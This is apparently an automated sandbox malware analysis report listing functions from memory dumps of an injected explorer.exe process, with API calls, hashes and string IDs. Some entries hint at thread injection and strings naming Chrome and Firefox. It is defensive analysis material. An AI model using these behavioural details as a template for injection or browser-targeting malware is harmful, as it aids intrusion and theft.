                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                          • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                                          • Instruction ID: 8c01630c687b2811ad14ff7469cf39aba7b8879d14df06fb42475a1172dfe992
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0376A641642C9CF20EF31D8C02AC3B64EB85B9AF4A59B6DE895B705DE64C486C340
                                                                                                                                                                                                                          Function 0E8CCD90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _callnewh.LIBCMT ref: 0E8CCD9E
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 0E8CCDAA
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _FF_MSGBANNER.LIBCMT ref: 0E8CD73C
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _NMSG_WRITE.LIBCMT ref: 0E8CD746
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: HeapAlloc.KERNEL32 ref: 0E8CD761
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _callnewh.LIBCMT ref: 0E8CD77A
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _errno.LIBCMT ref: 0E8CD785
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _errno.LIBCMT ref: 0E8CD790
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8CCDF3
                                                                                                                                                                                                                            • Part of subcall function 0E8CD7CC: RtlPcToFileHeader.NTDLL ref: 0E8CD85B
                                                                                                                                                                                                                            • Part of subcall function 0E8CD7CC: RaiseException.KERNEL32 ref: 0E8CD89A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                                                                                          • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                          • Opcode ID: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
                                                                                                                                                                                                                          • Instruction ID: 31577507f73e6d674cd6ecebbcc028361f3f67279e185dad4561be2c993e0ed2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0276130178E81DE30E744F050395A794E7C6388F444C29CA8E9BBA4EF3CD68ACB01
                                                                                                                                                                                                                          Function 08B8C190 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _callnewh.LIBCMT ref: 08B8C19E
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 08B8C1AA
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _FF_MSGBANNER.LIBCMT ref: 08B8CB3C
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _NMSG_WRITE.LIBCMT ref: 08B8CB46
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _callnewh.LIBCMT ref: 08B8CB7A
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB85
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB90
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8C1F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                          • String ID: rSingleObject
                                                                                                                                                                                                                          • API String ID: 431260796-42315373
                                                                                                                                                                                                                          • Opcode ID: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
                                                                                                                                                                                                                          • Instruction ID: 3c851fefd10a492ef79b768ae3dfcb48e4a4ee461a8a0569135e57419f7951c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF0E2A6300B8AC0EE64B740E4A07667B60F784385F484465CEDE0B728EF3CC249CB11
                                                                                                                                                                                                                          Function 0E8CA1C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B8DB0: HeapCreate.KERNEL32 ref: 0E8B8DCD
                                                                                                                                                                                                                            • Part of subcall function 0E8CBDA0: lstrcpyA.KERNEL32 ref: 0E8CBDF4
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8CA1F1
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8CA1FE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                          • String ID: Chrome$Firefox
                                                                                                                                                                                                                          • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                          • Opcode ID: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
                                                                                                                                                                                                                          • Instruction ID: 1d99302b4014ba53c23f0461a7acdf5ad76022dfb473d8d6664d9ccd55b8518a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE07E24621EC1D9EB08AB50FC8439423A8B755704F808E25C40D62330EF388599C750
                                                                                                                                                                                                                          Function 0E8C5720 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1128592954-0
                                                                                                                                                                                                                          • Opcode ID: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
                                                                                                                                                                                                                          • Instruction ID: 8ca645021ff16dc7ae958a3e9fb83841bc34b6c95a76f4f9369fa21dd81f9e95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501A22172578086DE548B16FD4432AA291EB4CFC0F489434DE4E93B1DEE3CD4818B00
                                                                                                                                                                                                                          Function 0E8CBDA0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 46sleepstringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8CBDF4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8CBE37
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8CBE4E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrlenmemcpy
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1946801326-109466966
                                                                                                                                                                                                                          • Opcode ID: 825ede52b5fab4480a58e0c110d7bd21af9c18cc8314a02790c06f94625bd149
                                                                                                                                                                                                                          • Instruction ID: e62a3840e15d287d563e1bbe1c93761341a878a7697dfda286ccc511fa611558
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825ede52b5fab4480a58e0c110d7bd21af9c18cc8314a02790c06f94625bd149
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A118B3161AF80CAEB20DB14F8A535A73E1F789B48F404929E68E8B719DF3CC804CB41
                                                                                                                                                                                                                          Function 0E8B508C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                          • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                          • Opcode ID: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
                                                                                                                                                                                                                          • Instruction ID: c240129c9ae14b47df3781719cab60f2cec0514ddcb957bccfd753d7caa73898
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8101A76171458082EB50CF66F54074AA3A0F784FC4F489416DF1C97B4DEF29C991CB04
                                                                                                                                                                                                                          Function 08B8C11C Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2064194629-0
                                                                                                                                                                                                                          • Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                                                                          • Instruction ID: b96087b2fb126981458bfb2814ad8123a75794c5a23b45fec955f685f2a58932
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F01C28212B09D1EE5CBBA1E89432D3760FF89746F989869868D47B64DF3DD061C712
                                                                                                                                                                                                                          Function 0E8C9C20 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9DC3
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: GetCurrentProcessId.KERNEL32 ref: 0E8CA028
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: CreateToolhelp32Snapshot.KERNEL32 ref: 0E8CA037
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32First.KERNEL32 ref: 0E8CA055
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32Next.KERNEL32 ref: 0E8CA075
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32Next.KERNEL32 ref: 0E8CA097
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9D53
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Module32$HandleModuleNext$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 460631091-109466966
                                                                                                                                                                                                                          • Opcode ID: ce0de96562c09befa4c62966705fad150591295f16c347ae0432f9ea965f8dc9
                                                                                                                                                                                                                          • Instruction ID: 73cf0e6093ad750bbadfca64ad497e110cdfed6a50ea43820e9b0af9ba60c1df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de96562c09befa4c62966705fad150591295f16c347ae0432f9ea965f8dc9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9491D222215AC481DA22DB29E4143EAB3E0FFD9BD8F444A25DE9D9B764EF38C545C300
                                                                                                                                                                                                                          Function 0E8B8EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ContextThread
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1591575202-109466966
                                                                                                                                                                                                                          • Opcode ID: fecf89f2c3639f52313cb09aa175c09b4a4fefa18e6b65a42e0e7dfdb00e1157
                                                                                                                                                                                                                          • Instruction ID: 7c4f528a4aafa788ac3b6cdea2f998670b72c8dbbc0998b31ada3a6a2b4cd360
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fecf89f2c3639f52313cb09aa175c09b4a4fefa18e6b65a42e0e7dfdb00e1157
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31D532219FC086D7348B55E8903EA73A6F788795F445925DE9DC7788DF7CC5468B00
                                                                                                                                                                                                                          Function 0E8CE010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,?,?,0E8B89C3,?,?,?,?,?,?,?,?,?), ref: 0E8CE582
                                                                                                                                                                                                                          • __crtCapturePreviousContext.LIBCMT ref: 0E8CE599
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CaptureContextFeaturePresentPreviousProcessor__crt
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3852779657-109466966
                                                                                                                                                                                                                          • Opcode ID: 9f9750af0869caff7b7432302491e62c4f13da1cefb75bf64360c45936dad3bf
                                                                                                                                                                                                                          • Instruction ID: e7786f2532a16cd427efa8494527fc56b86750a66a3dd2f224b96a2bd32e3ab4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f9750af0869caff7b7432302491e62c4f13da1cefb75bf64360c45936dad3bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F574315B80C6FF449B58F89036577A4F789344F90892ADA8EA77A1EF3CC959C700
                                                                                                                                                                                                                          Function 08B7D230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 08B82A90: _RunAllParam.LIBCPMT ref: 08B82AAC
                                                                                                                                                                                                                          • _RunAllParam.LIBCPMT ref: 08B7D263
                                                                                                                                                                                                                          • _RunAllParam.LIBCPMT ref: 08B7D276
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Param
                                                                                                                                                                                                                          • String ID: and ).
                                                                                                                                                                                                                          • API String ID: 1698386829-1089536224
                                                                                                                                                                                                                          • Opcode ID: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                                                                          • Instruction ID: 6c1c2dc404393b671c8b414eb69e2b37338ffccf81806b63a67e1c59e1f3198f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0AC6931270185DF69BFA6D4A132A2365EF85FD9F1855A5CE1E1B718CE29C482C380
                                                                                                                                                                                                                          Function 08B8BDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 08B8BDD9
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: std::_Lockit::_Lockit.LIBCPMT ref: 08B8BF12
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: free.LIBCMT ref: 08B8BF50
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: std::_Lockit::~_Lockit.LIBCPMT ref: 08B8BF5B
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B8BDE7
                                                                                                                                                                                                                            • Part of subcall function 08B8CACC: _errno.LIBCMT ref: 08B8CAEC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                                          • String ID: ore
                                                                                                                                                                                                                          • API String ID: 161006167-2619071404
                                                                                                                                                                                                                          • Opcode ID: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                                                                          • Instruction ID: 5da3293d5e19d2b6fc887b5f245110909cabc64c87ad3073a2c09d487b80e9b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F03976611B41E5DF29EF6AF4A03683368FB4CBA9F6890608A5D46724DF38C495C300
                                                                                                                                                                                                                          Function 08B8B6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B6CC
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B6ED
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: lp32Snapshot
                                                                                                                                                                                                                          • API String ID: 1924332735-2612382832
                                                                                                                                                                                                                          • Opcode ID: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                                                                          • Instruction ID: 194491874d3506334ff2c91ac79568c3e4ff3731841e737be6ab91fc709df0d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E04F76204B8AD1CB64EB60F49035AB7A0F398348F400415D2CD07B28EF7CC209CF01
                                                                                                                                                                                                                          Function 08B8B678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B68B
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B6A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: lstrcpyA
                                                                                                                                                                                                                          • API String ID: 1924332735-2919489367
                                                                                                                                                                                                                          • Opcode ID: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                                                                          • Instruction ID: 94f29a07c528590b2fa69bf6a3d43102e1cad4f70991f5f859aa1bc384be8b5d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25D04C6A108B8A95DA65EB44E450359B365F794348F80861292DD07A28DFB8D219CB01
                                                                                                                                                                                                                          Function 08B8B640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B653
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B670
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: enProcess
                                                                                                                                                                                                                          • API String ID: 1924332735-3780156600
                                                                                                                                                                                                                          • Opcode ID: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
                                                                                                                                                                                                                          • Instruction ID: c968bc4217308fa0ce2aab9905089b081bfc6bffdbc2788d5efb5e316af73663
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAD06266104F8ED5DE25EB44F450359B764F794348F80451292DD07E28DFBCD219CB01
                                                                                                                                                                                                                          Function 0E8CA990 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3605230531-0
                                                                                                                                                                                                                          • Opcode ID: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
                                                                                                                                                                                                                          • Instruction ID: 88bf4d9303d995c5d47f81676de96a0edb7ed059dd687ccb715604bbbe91bc14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
